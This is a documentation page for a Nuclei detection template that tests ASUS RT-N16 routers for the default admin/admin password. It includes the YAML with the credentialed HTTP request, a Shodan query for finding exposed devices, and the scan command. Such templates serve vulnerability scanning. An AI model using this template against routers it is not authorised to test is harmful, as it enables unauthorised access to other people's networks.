ASUS RT-N16 - Default Login
ID: asus-rtn16-default-login
Severity: high
Author: ritikchaddha
Tags: default-login,asus,rt-n16
Description
Section titled “Description”ASUS RT-N16 contains a default login vulnerability. Default admin login password ‘admin’ was found.
YAML Source
Section titled “YAML Source”id: asus-rtn16-default-login
info: name: ASUS RT-N16 - Default Login author: ritikchaddha severity: high description: | ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. classification: cpe: cpe:2.3:h:asus:rt-n16:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: asus product: rt-n16 shodan-query: "RT-N16" tags: default-login,asus,rt-n16
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}}
attack: pitchfork payloads: username: - admin password: - admin
matchers-condition: and matchers: - type: word part: body words: - 'ASUS' - 'RT-N16' - 'System Status' - 'Network Map' condition: and
- type: status status: - 200# digest: 4a0a00473045022100d4554b87c689e75db0da2ec8b53ceac60247de7938ce8640662007eef1e6dbec0220614133c9c517b25dffae5d36bdecf16460edf9f776d4f5bc7e0294f13210902a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/asus/asus-rtn16-default-login.yaml"